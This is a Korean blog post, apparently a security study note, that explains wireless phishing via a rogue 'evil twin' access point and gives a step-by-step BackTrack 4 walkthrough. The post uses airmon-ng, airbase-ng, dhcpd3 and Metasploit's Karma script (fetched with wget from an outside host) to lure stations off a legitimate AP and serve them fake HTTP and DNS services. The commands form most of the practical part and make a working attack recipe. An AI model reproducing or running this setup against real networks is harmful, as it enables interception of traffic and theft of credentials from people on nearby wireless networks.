[802.11] Phishing Attack
공부/Network 2012. 6. 29. 16:33 |무선 피싱 공격에 대해 알아보도록 하겠습니다.
무선 피싱 공격(wireless Phishing)이란??
무선해킹 피해사고 관련 뉴스: http://www.boannews.com/media/view.asp?idx=22344&kind=0
피싱(Phishing)이란 개인정보란 뜻의 (Private Data)와 낚시(Fishing)의 합성어로서 그냥 말 그대로 개인정보를 낚는다는 의미입니다.
피싱의 원리는 이러합니다.
AP와 연결된 Station을 DoS(서비스 거부 공격)을 이용하여 연결을 끊거나, 혹은 신호감도를 약해졌을 때
크래커가 만든 가짜AP에 접속하게 유도를 하는겁니다.
어떻게 유도를 할까요?
그건 로밍 트리거(Roaming Trigger)를 이용한 방법인데, 이종의 무선 네트워크의 특성입니다.
무선 네트워크는 연결이 끊어지거나, 신호가 약하면 더 강한 신호의 세기를 가진 네트워크에 연결하려는 특징이 있습니다.
이를 로밍 트리거라고하는데, 이를 이용하여 피싱을 하면 엄청나겠죠? 가령 자신이 더 높은 신호세기를 보내거나...
연결이 끊긴 후 station에게 기존 AP의 BSSID로 스푸핑을 하면?
그러니까 이 그림 하나로 요약이 되는거죠.
그럼 본론에 앞서서 우선 전제 사항을 말씀드릴게요
[우선 이 모의해킹은 back track 4 final을 이용하여 진행하였습니다.]
[사용 가능한 무선 랜카드는 aircrack 홈페이지를 참고하시길 바랍니다.]
iwconfig
언제나 하던대로 우선 무선 네트워크가 연결되어있는지 확인합니다.
airmon-ng start <무선랜카드 명>
모니터 설정 모드로 모니터모드 1개를 만들어 줍니다.
한번 더 확인을 해서 성공적으로 모니터 모드가 만들어 졌다면 다음 단계로 진행합니다.
wget http://metasploit.com/users/hdm/tools/karma.rc
Web Get 명령을 통해 karma.rc파일을 다운로드 받습니다.
이 파일은 HTTP와 DNS서버를 연동시켜주는 역할을 합니다. 한마디로 가짜 AP에서도 인터넷이 되게하기위한 필수 요소겠지요.
vi <dhcpd.conf 파일의 경로>
dhcpd.conf 파일은 자동으로 아이피를 할당 받게. 그러니까 가짜 AP에 연결한 station들에게 자동으로 인터넷이 되게
아이피를 자동으로 할당해주는 역할을 하는 기능을 합니다. 매우 중요한 역할을 수행하지요.
이 dhcpd.conf파일을 vi로 열어 다음과 같이 수정해줍니다 =)
수정하고 나시면 저장하시고 계속 진행됩니다.
airbase-ng -c <채널> -e "<ESSID>" -y -v <모니터링 무선 NIC>
airbase-ng는 가짜 AP를 만들어주는 프로그램입니다.
우선 위의 사진을 해석하자면 이렇습니다.
1번 채널로 "DCosAP"라는 SSID를 가진 AP를 만든다..
-y라는 옵션은 Probe Request에 대해 Response하지 않겠다는 의미입니다.
즉, 자동으로 연결하려는 station은 별도의 응답을 하지않고 바로바로 연결시켜주겠다는 뜻이 되지요.
명령어를 입력하시면 저렇게 뜨는걸 보실 수 있습니다.
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
ifconfig at0
이제 저렇게 명령어를 입력해서 가상 랜카드에 넷마스크와 게이트웨이를 설정해 줍니다.
이렇게 설정해야 접속된 station들에게 DHCP로 자동적으로 10.0.0.0 대역으로 아이피를 부여해줄 수 있기 때문이죠.
dhcpd3 -cf <dhcpd.conf 파일의 위치> at0
이제 저 명령어를 통해서 DHCP설정을 at0이라는 가상으로 만든 NIC에 활성화시켜 줍니다.
여기까지 과정이 되면 연결된 station은 자동으로 IP를 할당받게 됩니다.
msfconsole -r <karma.rc파일의 위치>
이 명령어는 DNS서버와 HTTP를 연결시켜주는 명령어입니다.
이렇게 함으로써 정상적인 인터넷을 할 수 있게 됩니다.(참고※크래커의 컴퓨터가 인터넷이 되지않는다면 무용지물입니다.)
카르마파일을 실행하고나면 위와같이 좌르륵뜨다가 서버가 스타트됩니다.
그리고 피싱AP가 실제로 등록된 모습을 확인하실 수 있습니다.
출처 - 옛날 블로그 2011/02/27 13:53
'공부 > Network' 카테고리의 다른 글
[802.11] Frame - Frame Control (0) | 2012.06.29 |
---|---|
[802.11] 4가지 오해들 (0) | 2012.06.29 |
[802.11] Dynamic WEP (1) | 2012.06.29 |
[802.11] WPA-PSK, AES, TKIP (0) | 2012.06.29 |
[802.11] WIPS (1) | 2012.06.29 |